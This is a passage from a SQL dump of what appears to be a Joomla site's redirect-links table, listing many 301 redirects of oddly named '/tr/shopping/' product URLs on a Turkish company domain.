00:00:00',301),(69627,'https://3s-technologies.com.tr/tr/shopping/macropodus/2655758465.html',NULL,'https://3s-technologies.com.tr/shopping/macropodus/2655758465.html','',1,0,'2026-06-11 01:18:58','0000-00-00 00:00:00',301),(69628,'https://3s-technologies.com.tr/tr/shopping/geocentrical/3036362719.html',NULL,'https://3s-technologies.com.tr/shopping/geocentrical/3036362719.html','',1,0,'2026-06-11 01:19:01','0000-00-00 00:00:00',301),(69629,'https://3s-technologies.com.tr/tr/shopping/cemental/2789049756.html',NULL,'https://3s-technologies.com.tr/shopping/cemental/2789049756.html','',1,0,'2026-06-11 01:19:04','0000-00-00 00:00:00',301),(69630,'https://3s-technologies.com.tr/tr/shopping/endaspidean/3673132769.html',NULL,'https://3s-technologies.com.tr/shopping/endaspidean/3673132769.html','',1,0,'2026-06-11 01:19:07','0000-00-00 00:00:00',301),(69631,'https://3s-technologies.com.tr/tr/shopping/undisputable/2841182340.html',NULL,'https://3s-technologies.com.tr/shopping/undisputable/2841182340.html','',1,0,'2026-06-11 01:19:10','0000-00-00 00:00:00',301),(69632,'https://3s-technologies.com.tr/tr/shopping/gerardia/631897196.html',NULL,'https://3s-technologies.com.tr/shopping/gerardia/631897196.html','',1,0,'2026-06-11 01:19:13','0000-00-00 00:00:00',301),(69633,'https://3s-technologies.com.tr/tr/shopping/ligure/2891984726.html',NULL,'https://3s-technologies.com.tr/shopping/ligure/2891984726.html','',1,0,'2026-06-11 01:19:16','0000-00-00 00:00:00',301),(69634,'https://3s-technologies.com.tr/tr/shopping/bladdor/4021632916.html',NULL,'https://3s-technologies.com.tr/shopping/bladdor/4021632916.html','',1,0,'2026-06-11 01:19:19','0000-00-00 00:00:00',301),(69635,'https://3s-technologies.com.tr/tr/shopping/roomager/2929791436.html',NULL,'https://3s-technologies.com.tr/shopping/roomager/2929791436.html','',1,0,'2026-06-11 01:19:22','0000-00-00 00:00:00',301),(69636,'https://3s-technologies.com.tr/tr/shopping/patient/840569089.html',NULL,'https://3s-technologies.com.tr/shopping/patient/840569089.html','',1,0,'2026-06-11 01:19:25','0000-00-00 00:00:00',301),(69637,'https://3s-technologies.com.tr/tr/shopping/shrievalty/2374783970.html',NULL,'https://3s-technologies.com.tr/shopping/shrievalty/2374783970.html','',1,0,'2026-06-11 01:19:28','0000-00-00 00:00:00',301),(69638,'https://3s-technologies.com.tr/tr/shopping/tardigrade/4072208091.html',NULL,'https://3s-technologies.com.tr/shopping/tardigrade/4072208091.html','',1,0,'2026-06-11 01:19:33','0000-00-00 00:00:00',301),(69639,'https://3s-technologies.com.tr/tr/shopping/thribble/3032726406.html',NULL,'https://3s-technologies.com.tr/shopping/thribble/3032726406.html','',1,0,'2026-06-11 01:19:38','0000-00-00 00:00:00',301),(69640,'https://3s-technologies.com.tr/tr/shopping/demoted/1934738682.html',NULL,'https://3s-technologies.com.tr/shopping/demoted/1934738682.html','',1,0,'2026-06-11 01:19:40','0000-00-00 00:00:00',301),(69641,'https://3s-technologies.com.tr/tr/shopping/corrovaline/59912399.html',NULL,'https://3s-technologies.com.tr/shopping/corrovaline/59912399.html','',1,0,'2026-06-11 01:19:43','0000-00-00 00:00:00',301),(69642,'https://3s-technologies.com.tr/tr/shopping/agglutinating/1357442048.html',NULL,'https://3s-technologies.com.tr/shopping/agglutinating/1357442048.html','',1,0,'2026-06-11 01:19:46','0000-00-00 00:00:00',301),(69643,'https://3s-technologies.com.tr/tr/shopping/sternson/3700779214.html',NULL,'https://3s-technologies.com.tr/shopping/sternson/3700779214.html','',1,0,'2026-06-11 01:19:49','0000-00-00 00:00:00',301),(69644,'https://3s-technologies.com.tr/tr/shopping/pyrophoric/62336581.html',NULL,'https://3s-technologies.com.tr/shopping/pyrophoric/62336581.html','',1,0,'2026-06-11 01:19:52','0000-00-00 00:00:00',301),(69645,'https://3s-technologies.com.tr/tr/shopping/nostalgic/363992158.html',NULL,'https://3s-technologies.com.tr/shopping/nostalgic/363992158.html','',1,0,'2026-06-11 01:19:55','0000-00-00 00:00:00',301),(69646,'https://3s-technologies.com.tr/tr/shopping/stalemate/1017182299.html',NULL,'https://3s-technologies.com.tr/shopping/stalemate/1017182299.html','',1,0,'2026-06-11 01:19:58','0000-00-00 00:00:00',301),(69647,'https://3s-technologies.com.tr/tr/shopping/indigo/2342712244.html',NULL,'https://3s-technologies.com.tr/shopping/indigo/2342712244.html','',1,0,'2026-06-11 01:20:01','0000-00-00 00:00:00',301),(69648,'https://3s-technologies.com.tr/tr/shopping/tannage/3962489529.html',NULL,'https://3s-technologies.com.tr/shopping/tannage/3962489529.html','',1,0,'2026-06-11 01:20:04','0000-00-00 00:00:00',301),(69649,'https://3s-technologies.com.tr/tr/shopping/depeach/3785269186.html',NULL,'https://3s-technologies.com.tr/shopping/depeach/3785269186.html','',1,0,'2026-06-11 01:20:07','0000-00-00 00:00:00',301),(69650,'https://3s-technologies.com.tr/tr/shopping/noosed/3478343140.html',NULL,'https://3s-technologies.com.tr/shopping/noosed/3478343140.html','',1,0,'2026-06-11 01:20:10','0000-00-00 00:00:00',301),(69651,'https://3s-technologies.com.tr/tr/shopping/arrogate/2219063811.html',NULL,'https://3s-technologies.com.tr/shopping/arrogate/2219063811.html','',1,0,'2026-06-11 01:20:13','0000-00-00 00:00:00',301),(69652,'https://3s-technologies.com.tr/tr/shopping/attorneygeneral/2268472279.html',NULL,'https://3s-technologies.com.tr/shopping/attorneygeneral/2268472279.html','',1,0,'2026-06-11 01:20:22','0000-00-00 00:00:00',301),(69653,'https://3s-technologies.com.tr/tr/shopping/diureticus/2393514630.html',NULL,'https://3s-technologies.com.tr/shopping/diureticus/2393514630.html','',1,0,'2026-06-11 01:20:24','0000-00-00 00:00:00',301),(69654,'https://3s-technologies.com.tr/tr/shopping/inial/2735823156.html',NULL,'https://3s-technologies.com.tr/shopping/inial/2735823156.html','',1,0,'2026-06-11 01:20:27','0000-00-00 00:00:00',301),(69655,'https://3s-technologies.com.tr/tr/shopping/kilos/825638217.html',NULL,'https://3s-technologies.com.tr/shopping/kilos/825638217.html','',1,0,'2026-06-11 01:20:30','0000-00-00 00:00:00',301),(69656,'https://3s-technologies.com.tr/tr/shopping/inferrible/2415014862.html',NULL,'https://3s-technologies.com.tr/shopping/inferrible/2415014862.html','',1,0,'2026-06-11 01:20:33','0000-00-00 00:00:00',301),(69657,'https://3s-technologies.com.tr/tr/shopping/rallus/1257883735.html',NULL,'https://3s-technologies.com.tr/shopping/rallus/1257883735.html','',1,0,'2026-06-11 01:20:40','0000-00-00 00:00:00',301),(69658,'https://3s-technologies.com.tr/tr/shopping/anamnesis/3812050693.html',NULL,'https://3s-technologies.com.tr/shopping/anamnesis/3812050693.html','',1,0,'2026-06-11 01:20:44','0000-00-00 00:00:00',301),(69659,'https://3s-technologies.com.tr/tr/shopping/chinchona/951892683.html',NULL,'https://3s-technologies.com.tr/shopping/chinchona/951892683.html','',1,0,'2026-06-11 01:20:47','0000-00-00 00:00:00',301),(69660,'https://3s-technologies.com.tr/tr/shopping/adrift/1426108353.html',NULL,'https://3s-technologies.com.tr/shopping/adrift/1426108353.html','',1,0,'2026-06-11 01:20:51','0000-00-00 00:00:00',301),(69661,'https://3s-technologies.com.tr/tr/shopping/monodies/994998964.html',NULL,'https://3s-technologies.com.tr/shopping/monodies/994998964.html','',1,0,'2026-06-11 01:20:53','0000-00-00 00:00:00',301),(69662,'https://3s-technologies.com.tr/tr/shopping/smokiness/1901606162.html',NULL,'https://3s-technologies.com.tr/shopping/smokiness/1901606162.html','',1,0,'2026-06-11 01:20:56','0000-00-00 00:00:00',301),(69663,'https://3s-technologies.com.tr/tr/shopping/nonastringent/455509024.html',NULL,'https://3s-technologies.com.tr/shopping/nonastringent/455509024.html','',1,0,'2026-06-11 01:20:59','0000-00-00 00:00:00',301),(69664,'https://3s-technologies.com.tr/tr/shopping/fogies/1581876974.html',NULL,'https://3s-technologies.com.tr/shopping/fogies/1581876974.html','',1,0,'2026-06-11 01:21:02','0000-00-00 00:00:00',301),(69665,'https://3s-technologies.com.tr/tr/shopping/limelight/1215573623.html',NULL,'https://3s-technologies.com.tr/shopping/limelight/1215573623.html','',1,0,'2026-06-11 01:21:05','0000-00-00 00:00:00',301),(69666,'https://3s-technologies.com.tr/tr/shopping/terrar/3480767338.html',NULL,'https://3s-technologies.com.tr/shopping/terrar/3480767338.html','',1,0,'2026-06-11 01:21:08','0000-00-00 00:00:00',301),(69667,'https://3s-technologies.com.tr/tr/shopping/refrigerant/2111188385.html',NULL,'https://3s-technologies.com.tr/shopping/refrigerant/2111188385.html','',1,0,'2026-06-11 01:21:12','0000-00-00 00:00:00',301),(69668,'https://3s-technologies.com.tr/tr/shopping/brahman/1534142827.html',NULL,'https://3s-technologies.com.tr/shopping/brahman/1534142827.html','',1,0,'2026-06-11 01:21:15','0000-00-00 00:00:00',301),(69669,'https://3s-technologies.com.tr/tr/shopping/nebaloidea/605808192.html',NULL,'https://3s-technologies.com.tr/shopping/nebaloidea/605808192.html','',1,0,'2026-06-11 01:21:17','0000-00-00 00:00:00',301),(69670,'https://3s-technologies.com.tr/tr/shopping/endecagon/884491450.html',NULL,'https://3s-technologies.com.tr/shopping/endecagon/884491450.html','',1,0,'2026-06-11 01:21:21','0000-00-00 00:00:00',301),(69671,'https://3s-technologies.com.tr/tr/shopping/crinkled/3644752544.html',NULL,'https://3s-technologies.com.tr/shopping/crinkled/3644752544.html','',1,0,'2026-06-11 01:21:24','0000-00-00 00:00:00',301),(69672,'https://3s-technologies.com.tr/tr/shopping/swiftfoot/4250822368.html',NULL,'https://3s-technologies.com.tr/shopping/swiftfoot/4250822368.html','',1,0,'2026-06-11 01:21:26','0000-00-00 00:00:00',301),(69673,'https://3s-technologies.com.tr/tr/shopping/plucked/651580363.html',NULL,'https://3s-technologies.com.tr/shopping/plucked/651580363.html','',1,0,'2026-06-11 01:21:29','0000-00-00 00:00:00',301),(69674,'https://3s-technologies.com.tr/tr/shopping/shaftman/3731015579.html',NULL,'https://3s-technologies.com.tr/shopping/shaftman/3731015579.html','',1,0,'2026-06-11 01:21:32','0000-00-00 00:00:00',301),(69675,'https://3s-technologies.com.tr/tr/shopping/hindgut/1773265275.html',NULL,'https://3s-technologies.com.tr/shopping/hindgut/1773265275.html','',1,0,'2026-06-11 01:21:36','0000-00-00 00:00:00',301),(69676,'https://3s-technologies.com.tr/tr/shopping/stibonium/4140710857.html',NULL,'https://3s-technologies.com.tr/shopping/stibonium/4140710857.html','',1,0,'2026-06-11 01:21:39','0000-00-00 00:00:00',301),(69677,'https://3s-technologies.com.tr/tr/shopping/reinvolve/2423194539.html',NULL,'https://3s-technologies.com.tr/shopping/reinvolve/2423194539.html','',1,0,'2026-06-11 01:21:42','0000-00-00 00:00:00',301),(69678,'https://3s-technologies.com.tr/tr/shopping/phytology/1915826203.html',NULL,'https://3s-technologies.com.tr/shopping/phytology/1915826203.html','',1,0,'2026-06-11 01:21:45','0000-00-00 00:00:00',301),(69679,'https://3s-technologies.com.tr/tr/shopping/conversationalist/2318221462.html',NULL,'https://3s-technologies.com.tr/shopping/conversationalist/2318221462.html','',1,0,'2026-06-11 01:21:51','0000-00-00 00:00:00',301),(69680,'https://3s-technologies.com.tr/tr/shopping/waddie/1924454495.html',NULL,'https://3s-technologies.com.tr/shopping/waddie/1924454495.html','',1,0,'2026-06-11 01:21:55','0000-00-00 00:00:00',301),(69681,'https://3s-technologies.com.tr/tr/shopping/glauberite/4275016154.html',NULL,'https://3s-technologies.com.tr/shopping/glauberite/4275016154.html','',1,0,'2026-06-11 01:21:59','0000-00-00 00:00:00',301),(69682,'https://3s-technologies.com.tr/tr/shopping/retaliated/1716120740.html',NULL,'https://3s-technologies.com.tr/shopping/retaliated/1716120740.html','',1,0,'2026-06-11 01:22:02','0000-00-00 00:00:00',301),(69683,'https://3s-technologies.com.tr/tr/shopping/embolismic/1798671160.html',NULL,'https://3s-technologies.com.tr/shopping/embolismic/1798671160.html','',1,0,'2026-06-11 01:22:05','0000-00-00 00:00:00',301),(69684,'https://3s-technologies.com.tr/tr/shopping/amenities/2436575126.html',NULL,'https://3s-technologies.com.tr/shopping/amenities/2436575126.html','',1,0,'2026-06-11 01:22:08','0000-00-00 00:00:00',301),(69685,'https://3s-technologies.com.tr/tr/shopping/examiner/509216952.html',NULL,'https://3s-technologies.com.tr/shopping/examiner/509216952.html','',1,0,'2026-06-11 01:22:11','0000-00-00 00:00:00',301),(69686,'https://3s-technologies.com.tr/tr/shopping/tentwort/1827444350.html',NULL,'https://3s-technologies.com.tr/shopping/tentwort/1827444350.html','',1,0,'2026-06-11 01:22:14','0000-00-00 00:00:00',301),(69687,'https://3s-technologies.com.tr/tr/shopping/barbus/2458963142.html',NULL,'https://3s-technologies.com.tr/shopping/barbus/2458963142.html','',1,0,'2026-06-11 01:22:17','0000-00-00 00:00:00',301),(69688,'https://3s-technologies.com.tr/tr/shopping/dipneumona/2810290364.html',NULL,'https://3s-technologies.com.tr/shopping/dipneumona/2810290364.html','',1,0,'2026-06-11 01:22:20','0000-00-00 00:00:00',301),(69689,'https://3s-technologies.com.tr/tr/shopping/salmiac/1379471260.html',NULL,'https://3s-technologies.com.tr/shopping/salmiac/1379471260.html','',1,0,'2026-06-11 01:22:23','0000-00-00 00:00:00',301),(69690,'https://3s-technologies.com.tr/tr/shopping/philosophy/350542773.html',NULL,'https://3s-technologies.com.tr/shopping/philosophy/350542773.html','',1,0,'2026-06-11 01:22:26','0000-00-00 00:00:00',301),(69691,'https://3s-technologies.com.tr/tr/shopping/underprize/3627533492.html',NULL,'https://3s-technologies.com.tr/shopping/underprize/3627533492.html','',1,0,'2026-06-11 01:22:29','0000-00-00 00:00:00',301),(69692,'https://3s-technologies.com.tr/tr/shopping/idioplasm/3920315451.html',NULL,'https://3s-technologies.com.tr/shopping/idioplasm/3920315451.html','',1,0,'2026-06-11 01:22:32','0000-00-00 00:00:00',301),(69693,'https://3s-technologies.com.tr/tr/shopping/yogism/1659045494.html',NULL,'https://3s-technologies.com.tr/shopping/yogism/1659045494.html','',1,0,'2026-06-11 01:22:35','0000-00-00 00:00:00',301),(69694,'https://3s-technologies.com.tr/tr/shopping/brigandage/2407366380.html',NULL,'https://3s-technologies.com.tr/shopping/brigandage/2407366380.html','',1,0,'2026-06-11 01:22:38','0000-00-00 00:00:00',301),(69695,'https://3s-technologies.com.tr/tr/shopping/corticohypothalamic/2590083088.html',NULL,'https://3s-technologies.com.tr/shopping/corticohypothalamic/2590083088.html','',1,0,'2026-06-11 01:22:41','0000-00-00 00:00:00',301),(69696,'https://3s-technologies.com.tr/tr/shopping/catelectrotonic/1193388092.html',NULL,'https://3s-technologies.com.tr/shopping/catelectrotonic/1193388092.html','',1,0,'2026-06-11 01:22:44','0000-00-00 00:00:00',301),(69697,'https://3s-technologies.com.tr/tr/shopping/blowball/3921527550.html',NULL,'https://3s-technologies.com.tr/shopping/blowball/3921527550.html','',1,0,'2026-06-11 01:22:48','0000-00-00 00:00:00',301),(69698,'https://3s-technologies.com.tr/tr/shopping/fatuellus/4008924515.html',NULL,'https://3s-technologies.com.tr/shopping/fatuellus/4008924515.html','',1,0,'2026-06-11 01:22:51','0000-00-00 00:00:00',301),(69699,'https://3s-technologies.com.tr/tr/shopping/clinium/1517962964.html',NULL,'https://3s-technologies.com.tr/shopping/clinium/1517962964.html','',1,0,'2026-06-11 01:22:53','0000-00-00 00:00:00',301),(69700,'https://3s-technologies.com.tr/tr/shopping/smoked/1008321702.html',NULL,'https://3s-technologies.com.tr/shopping/smoked/1008321702.html','',1,0,'2026-06-11 01:22:56','0000-00-00 00:00:00',301),(69701,'https://3s-technologies.com.tr/tr/shopping/lordlier/2987041820.html',NULL,'https://3s-technologies.com.tr/shopping/lordlier/2987041820.html','',1,0,'2026-06-11 01:22:59','0000-00-00 00:00:00',301),(69702,'https://3s-technologies.com.tr/tr/shopping/lappeting/489533785.html',NULL,'https://3s-technologies.com.tr/shopping/lappeting/489533785.html','',1,0,'2026-06-11 01:23:02','0000-00-00 00:00:00',301),(69703,'https://3s-technologies.com.tr/tr/shopping/nearness/2690050985.html',NULL,'https://3s-technologies.com.tr/shopping/nearness/2690050985.html','',1,0,'2026-06-11 01:23:06','0000-00-00 00:00:00',301),(69704,'https://3s-technologies.com.tr/tr/shopping/naocl/1321797745.html',NULL,'https://3s-technologies.com.tr/shopping/naocl/1321797745.html','',1,0,'2026-06-11 01:23:09','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (69705,'https://3s-technologies.com.tr/tr/shopping/asiaticus/2721421312.html',NULL,'https://3s-technologies.com.tr/shopping/asiaticus/2721421312.html','',1,0,'2026-06-11 01:23:12','0000-00-00 00:00:00',301),(69706,'https://3s-technologies.com.tr/tr/shopping/kinology/1675793399.html',NULL,'https://3s-technologies.com.tr/shopping/kinology/1675793399.html','',1,0,'2026-06-11 01:23:15','0000-00-00 00:00:00',301),(69707,'https://3s-technologies.com.tr/tr/shopping/chert/2785413443.html',NULL,'https://3s-technologies.com.tr/shopping/chert/2785413443.html','',1,0,'2026-06-11 01:23:18','0000-00-00 00:00:00',301),(69708,'https://3s-technologies.com.tr/tr/shopping/ordinand/3418680189.html',NULL,'https://3s-technologies.com.tr/shopping/ordinand/3418680189.html','',1,0,'2026-06-11 01:23:21','0000-00-00 00:00:00',301),(69709,'https://3s-technologies.com.tr/tr/shopping/longimana/4170554289.html',NULL,'https://3s-technologies.com.tr/shopping/longimana/4170554289.html','',1,0,'2026-06-11 01:23:24','0000-00-00 00:00:00',301),(69710,'https://3s-technologies.com.tr/tr/shopping/decoration/2357005421.html',NULL,'https://3s-technologies.com.tr/shopping/decoration/2357005421.html','',1,0,'2026-06-11 01:23:27','0000-00-00 00:00:00',301),(69711,'https://3s-technologies.com.tr/tr/shopping/unthriftfully/3762642241.html',NULL,'https://3s-technologies.com.tr/shopping/unthriftfully/3762642241.html','',1,0,'2026-06-11 01:23:30','0000-00-00 00:00:00',301),(69712,'https://3s-technologies.com.tr/tr/shopping/cumulose/294988092.html',NULL,'https://3s-technologies.com.tr/shopping/cumulose/294988092.html','',1,0,'2026-06-11 01:23:33','0000-00-00 00:00:00',301),(69713,'https://3s-technologies.com.tr/tr/shopping/jubilant/1770677554.html',NULL,'https://3s-technologies.com.tr/shopping/jubilant/1770677554.html','',1,0,'2026-06-11 01:23:37','0000-00-00 00:00:00',301),(69714,'https://3s-technologies.com.tr/tr/shopping/butyrate/1628174491.html',NULL,'https://3s-technologies.com.tr/shopping/butyrate/1628174491.html','',1,0,'2026-06-11 01:23:39','0000-00-00 00:00:00',301),(69715,'https://3s-technologies.com.tr/tr/shopping/suslik/214312570.html',NULL,'https://3s-technologies.com.tr/shopping/suslik/214312570.html','',1,0,'2026-06-11 01:23:42','0000-00-00 00:00:00',301),(69716,'https://3s-technologies.com.tr/tr/shopping/sanders/3078594662.html',NULL,'https://3s-technologies.com.tr/shopping/sanders/3078594662.html','',1,0,'2026-06-11 01:23:45','0000-00-00 00:00:00',301),(69717,'https://3s-technologies.com.tr/tr/shopping/surrejoinder/3410629342.html',NULL,'https://3s-technologies.com.tr/shopping/surrejoinder/3410629342.html','',1,0,'2026-06-11 01:23:48','0000-00-00 00:00:00',301),(69718,'https://3s-technologies.com.tr/tr/shopping/seventeen/1463279551.html',NULL,'https://3s-technologies.com.tr/shopping/seventeen/1463279551.html','',1,0,'2026-06-11 01:23:51','0000-00-00 00:00:00',301),(69719,'https://3s-technologies.com.tr/tr/shopping/infatigable/1612061224.html',NULL,'https://3s-technologies.com.tr/shopping/infatigable/1612061224.html','',1,0,'2026-06-11 01:23:54','0000-00-00 00:00:00',301),(69720,'https://3s-technologies.com.tr/tr/shopping/hopedfor/579777053.html',NULL,'https://3s-technologies.com.tr/shopping/hopedfor/579777053.html','',1,0,'2026-06-11 01:23:57','0000-00-00 00:00:00',301),(69721,'https://3s-technologies.com.tr/tr/shopping/orizabensis/101373670.html',NULL,'https://3s-technologies.com.tr/shopping/orizabensis/101373670.html','',1,0,'2026-06-11 01:24:00','0000-00-00 00:00:00',301),(69722,'https://3s-technologies.com.tr/tr/shopping/overniceness/3554181343.html',NULL,'https://3s-technologies.com.tr/shopping/overniceness/3554181343.html','',1,0,'2026-06-11 01:24:03','0000-00-00 00:00:00',301),(69723,'https://3s-technologies.com.tr/tr/shopping/unwarrantable/3855147574.html',NULL,'https://3s-technologies.com.tr/shopping/unwarrantable/3855147574.html','',1,0,'2026-06-11 01:24:06','0000-00-00 00:00:00',301),(69724,'https://3s-technologies.com.tr/tr/shopping/incenter/2495497125.html',NULL,'https://3s-technologies.com.tr/shopping/incenter/2495497125.html','',1,0,'2026-06-11 01:24:09','0000-00-00 00:00:00',301),(69725,'https://3s-technologies.com.tr/tr/shopping/sporule/2903317883.html',NULL,'https://3s-technologies.com.tr/shopping/sporule/2903317883.html','',1,0,'2026-06-11 01:24:12','0000-00-00 00:00:00',301),(69726,'https://3s-technologies.com.tr/tr/shopping/enubilous/198162443.html',NULL,'https://3s-technologies.com.tr/shopping/enubilous/198162443.html','',1,0,'2026-06-11 01:24:15','0000-00-00 00:00:00',301),(69727,'https://3s-technologies.com.tr/tr/shopping/manumotive/2545308816.html',NULL,'https://3s-technologies.com.tr/shopping/manumotive/2545308816.html','',1,0,'2026-06-11 01:24:18','0000-00-00 00:00:00',301),(69728,'https://3s-technologies.com.tr/tr/shopping/guettarda/633109295.html',NULL,'https://3s-technologies.com.tr/shopping/guettarda/633109295.html','',1,0,'2026-06-11 01:24:21','0000-00-00 00:00:00',301),(69729,'https://3s-technologies.com.tr/tr/shopping/unbridled/385386716.html',NULL,'https://3s-technologies.com.tr/shopping/unbridled/385386716.html','',1,0,'2026-06-11 01:24:24','0000-00-00 00:00:00',301),(69730,'https://3s-technologies.com.tr/tr/shopping/woodworm/3424451372.html',NULL,'https://3s-technologies.com.tr/shopping/woodworm/3424451372.html','',1,0,'2026-06-11 01:24:27','0000-00-00 00:00:00',301),(69731,'https://3s-technologies.com.tr/tr/shopping/tangents/3682473868.html',NULL,'https://3s-technologies.com.tr/shopping/tangents/3682473868.html','',1,0,'2026-06-11 01:24:30','0000-00-00 00:00:00',301),(69732,'https://3s-technologies.com.tr/tr/shopping/cardamomum/2697467178.html',NULL,'https://3s-technologies.com.tr/shopping/cardamomum/2697467178.html','',1,0,'2026-06-11 01:24:33','0000-00-00 00:00:00',301),(69733,'https://3s-technologies.com.tr/tr/shopping/turgid/2113612567.html',NULL,'https://3s-technologies.com.tr/shopping/turgid/2113612567.html','',1,0,'2026-06-11 01:24:36','0000-00-00 00:00:00',301),(69734,'https://3s-technologies.com.tr/tr/shopping/frenzied/1392094653.html',NULL,'https://3s-technologies.com.tr/shopping/frenzied/1392094653.html','',1,0,'2026-06-11 01:24:39','0000-00-00 00:00:00',301),(69735,'https://3s-technologies.com.tr/tr/shopping/cohesive/635273885.html',NULL,'https://3s-technologies.com.tr/shopping/cohesive/635273885.html','',1,0,'2026-06-11 01:24:42','0000-00-00 00:00:00',301),(69736,'https://3s-technologies.com.tr/tr/shopping/leptodactylidae/334420791.html',NULL,'https://3s-technologies.com.tr/shopping/leptodactylidae/334420791.html','',1,0,'2026-06-11 01:24:46','0000-00-00 00:00:00',301),(69737,'https://3s-technologies.com.tr/tr/shopping/nepheline/1537425121.html',NULL,'https://3s-technologies.com.tr/shopping/nepheline/1537425121.html','',1,0,'2026-06-11 01:24:48','0000-00-00 00:00:00',301),(69738,'https://3s-technologies.com.tr/tr/shopping/philopolemical/1909640767.html',NULL,'https://3s-technologies.com.tr/shopping/philopolemical/1909640767.html','',1,0,'2026-06-11 01:24:51','0000-00-00 00:00:00',301),(69739,'https://3s-technologies.com.tr/tr/shopping/bespeckle/3435285205.html',NULL,'https://3s-technologies.com.tr/shopping/bespeckle/3435285205.html','',1,0,'2026-06-11 01:24:54','0000-00-00 00:00:00',301),(69740,'https://3s-technologies.com.tr/tr/shopping/hemorrhage/1396297302.html',NULL,'https://3s-technologies.com.tr/shopping/hemorrhage/1396297302.html','',1,0,'2026-06-11 01:24:57','0000-00-00 00:00:00',301),(69741,'https://3s-technologies.com.tr/tr/shopping/trachypteridae/4170940412.html',NULL,'https://3s-technologies.com.tr/shopping/trachypteridae/4170940412.html','',1,0,'2026-06-11 01:25:00','0000-00-00 00:00:00',301),(69742,'https://3s-technologies.com.tr/tr/shopping/poupeton/2384723177.html',NULL,'https://3s-technologies.com.tr/shopping/poupeton/2384723177.html','',1,0,'2026-06-11 01:25:03','0000-00-00 00:00:00',301),(69743,'https://3s-technologies.com.tr/tr/shopping/allegretto/3251242340.html',NULL,'https://3s-technologies.com.tr/shopping/allegretto/3251242340.html','',1,0,'2026-06-11 01:25:06','0000-00-00 00:00:00',301),(69744,'https://3s-technologies.com.tr/tr/shopping/caroteel/2303615314.html',NULL,'https://3s-technologies.com.tr/shopping/caroteel/2303615314.html','',1,0,'2026-06-11 01:25:09','0000-00-00 00:00:00',301),(69745,'https://3s-technologies.com.tr/tr/shopping/piperita/671919141.html',NULL,'https://3s-technologies.com.tr/shopping/piperita/671919141.html','',1,0,'2026-06-11 01:25:12','0000-00-00 00:00:00',301),(69746,'https://3s-technologies.com.tr/tr/shopping/houseline/1775351712.html',NULL,'https://3s-technologies.com.tr/shopping/houseline/1775351712.html','',1,0,'2026-06-11 01:25:15','0000-00-00 00:00:00',301),(69747,'https://3s-technologies.com.tr/tr/shopping/metabranchial/3656989798.html',NULL,'https://3s-technologies.com.tr/shopping/metabranchial/3656989798.html','',1,0,'2026-06-11 01:25:18','0000-00-00 00:00:00',301),(69748,'https://3s-technologies.com.tr/tr/shopping/sanseviera/1138304526.html',NULL,'https://3s-technologies.com.tr/shopping/sanseviera/1138304526.html','',1,0,'2026-06-11 01:25:21','0000-00-00 00:00:00',301),(69749,'https://3s-technologies.com.tr/tr/shopping/peepoday/3062721095.html',NULL,'https://3s-technologies.com.tr/shopping/peepoday/3062721095.html','',1,0,'2026-06-11 01:25:24','0000-00-00 00:00:00',301),(69750,'https://3s-technologies.com.tr/tr/shopping/archaeologian/665432097.html',NULL,'https://3s-technologies.com.tr/shopping/archaeologian/665432097.html','',1,0,'2026-06-11 01:25:27','0000-00-00 00:00:00',301),(69751,'https://3s-technologies.com.tr/tr/shopping/myxocystodea/1148087052.html',NULL,'https://3s-technologies.com.tr/shopping/myxocystodea/1148087052.html','',1,0,'2026-06-11 01:25:30','0000-00-00 00:00:00',301),(69752,'https://3s-technologies.com.tr/tr/shopping/sowse/331419164.html',NULL,'https://3s-technologies.com.tr/shopping/sowse/331419164.html','',1,0,'2026-06-11 01:25:33','0000-00-00 00:00:00',301),(69753,'https://3s-technologies.com.tr/tr/shopping/whimbrel/1041212578.html',NULL,'https://3s-technologies.com.tr/shopping/whimbrel/1041212578.html','',1,0,'2026-06-11 01:25:36','0000-00-00 00:00:00',301),(69754,'https://3s-technologies.com.tr/tr/shopping/circumnutate/99082465.html',NULL,'https://3s-technologies.com.tr/shopping/circumnutate/99082465.html','',1,0,'2026-06-11 01:25:39','0000-00-00 00:00:00',301),(69755,'https://3s-technologies.com.tr/tr/shopping/coccinella/689311103.html',NULL,'https://3s-technologies.com.tr/shopping/coccinella/689311103.html','',1,0,'2026-06-11 01:25:42','0000-00-00 00:00:00',301),(69756,'https://3s-technologies.com.tr/tr/shopping/anotherprenominal/1141074066.html',NULL,'https://3s-technologies.com.tr/shopping/anotherprenominal/1141074066.html','',1,0,'2026-06-11 01:25:45','0000-00-00 00:00:00',301),(69757,'https://3s-technologies.com.tr/tr/shopping/acotyledon/3564789829.html',NULL,'https://3s-technologies.com.tr/shopping/acotyledon/3564789829.html','',1,0,'2026-06-11 01:25:50','0000-00-00 00:00:00',301),(69758,'https://3s-technologies.com.tr/tr/shopping/heighho/2323636242.html',NULL,'https://3s-technologies.com.tr/shopping/heighho/2323636242.html','',1,0,'2026-06-11 01:25:52','0000-00-00 00:00:00',301),(69759,'https://3s-technologies.com.tr/tr/shopping/barleybreakbaumrlybrak/3453339604.html',NULL,'https://3s-technologies.com.tr/shopping/barleybreakbaumrlybrak/3453339604.html','',1,0,'2026-06-11 01:25:55','0000-00-00 00:00:00',301),(69760,'https://3s-technologies.com.tr/tr/shopping/egesta/1110050916.html',NULL,'https://3s-technologies.com.tr/shopping/egesta/1110050916.html','',1,0,'2026-06-11 01:25:58','0000-00-00 00:00:00',301),(69761,'https://3s-technologies.com.tr/tr/shopping/consomme/3787030915.html',NULL,'https://3s-technologies.com.tr/shopping/consomme/3787030915.html','',1,0,'2026-06-11 01:26:01','0000-00-00 00:00:00',301),(69762,'https://3s-technologies.com.tr/tr/shopping/anthropogenesis/3478729279.html',NULL,'https://3s-technologies.com.tr/shopping/anthropogenesis/3478729279.html','',1,0,'2026-06-11 01:26:04','0000-00-00 00:00:00',301),(69763,'https://3s-technologies.com.tr/tr/shopping/dumetose/1292205421.html',NULL,'https://3s-technologies.com.tr/shopping/dumetose/1292205421.html','',1,0,'2026-06-11 01:26:07','0000-00-00 00:00:00',301),(69764,'https://3s-technologies.com.tr/tr/shopping/gymnocladus/230089210.html',NULL,'https://3s-technologies.com.tr/shopping/gymnocladus/230089210.html','',1,0,'2026-06-11 01:26:10','0000-00-00 00:00:00',301),(69765,'https://3s-technologies.com.tr/tr/shopping/translatress/3341527795.html',NULL,'https://3s-technologies.com.tr/shopping/translatress/3341527795.html','',1,0,'2026-06-11 01:26:13','0000-00-00 00:00:00',301),(69766,'https://3s-technologies.com.tr/tr/shopping/swartiness/3845498025.html',NULL,'https://3s-technologies.com.tr/shopping/swartiness/3845498025.html','',1,0,'2026-06-11 01:26:16','0000-00-00 